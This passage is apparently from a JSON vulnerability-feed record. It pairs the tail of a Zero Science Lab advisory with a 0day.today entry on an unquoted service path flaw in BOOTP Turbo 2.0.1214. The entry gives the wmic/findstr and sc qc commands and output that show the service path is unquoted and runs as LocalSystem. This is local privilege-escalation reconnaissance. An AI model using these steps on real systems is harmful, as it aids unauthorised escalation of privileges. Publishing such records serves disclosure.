https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php \n \nChangelog \n \n[15.02.2020] - Initial release \n \nContact \n \nZero Science Lab \n \nWeb: http://www.zeroscience.mk \ne-mail: lab@zeroscience.mk \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156387/ZSL-2020-5562.txt"}], "zdt": [{"lastseen": "2020-02-21T03:21:34", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2020-02-17T00:00:00", "published": "2020-02-17T00:00:00", "id": "1337DAY-ID-33976", "href": "https://0day.today/exploit/description/33976", "title": "BOOTP Turbo 2.0.1214 - (BOOTP Turbo) Unquoted Service Path Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path\r\n# Exploit Author: boku\r\n# Vendor Homepage: https://www.weird-solutions.com\r\n# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe\r\n# Version: 2.0.1214\r\n# Tested On: Windows 10 (32-bit)\r\n\r\nC:\\Users\\user>wmic service get name, pathname, startmode | findstr \"BOOTP\" | findstr /i /v \"\"\"\r\nBOOTP Turbo C:\\Program Files\\BOOTP Turbo\\bootpt.exe Auto\r\n\r\nC:\\Users\\user>sc qc \"BOOTP Turbo\"\r\n[SC] QueryServiceConfig SUCCESS\r\n\r\nSERVICE_NAME: BOOTP Turbo\r\n TYPE : 10 WIN32_OWN_PROCESS\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:\\Program Files\\BOOTP Turbo\\bootpt.exe\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : BOOTP Turbo\r\n DEPENDENCIES : Nsi\r\n : Afd\r\n : NetBT\r\n : Tcpip\r\n SERVICE_START_NAME : LocalSystem\n\n# 0day.today [2020-02-21] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33976"}]}
